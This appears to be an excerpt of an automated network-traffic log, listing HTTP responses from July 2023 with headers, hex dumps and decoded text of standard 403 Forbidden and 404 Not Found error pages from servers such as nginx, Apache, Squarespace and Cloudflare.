                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:36 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLpw3GZpG9QSouPAZi3orbSrJftmKrOReD3ukbbas4YDoX-Wix-Request-Id: 1690487616.00063316629415576X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:36 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 27 Jul 2023 19:53:36 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 5411342B:C437_D5BA2110:0050_64C2CB40_3D0B:2B13Dx-iplb-instance: 28098Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:37 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:39 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:40 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:40 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:40 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=Bd77ZyzZlIfWMzQ4NDlhNTg2Mzk5YWJiMDc1M2I5ODUwYTEwMTUz;Path=/X-Contextid: U5FGGvm8/H37qJA1tData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dSqCmuYtPNLwatGMGfVzsip0ed8UFy9RzQOHVZ54zosABwB3d%2B%2BRjHqCRz0%2BfQzYO6chWf0McKCTxe%2Fg5KdBywcoPjtPr05oEGiyH%2BLv69b5u19xYOd74MtAjb%2FM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e0eca60bb59-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:41 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BbXMH8sCRsfpNmMwMmUzODQ5MmM4Y2RlMDZkYTQ3YWYxMGIzNjMy;Path=/X-Contextid: sCKeb2t1/ZHDSqi7JData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:53:42 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
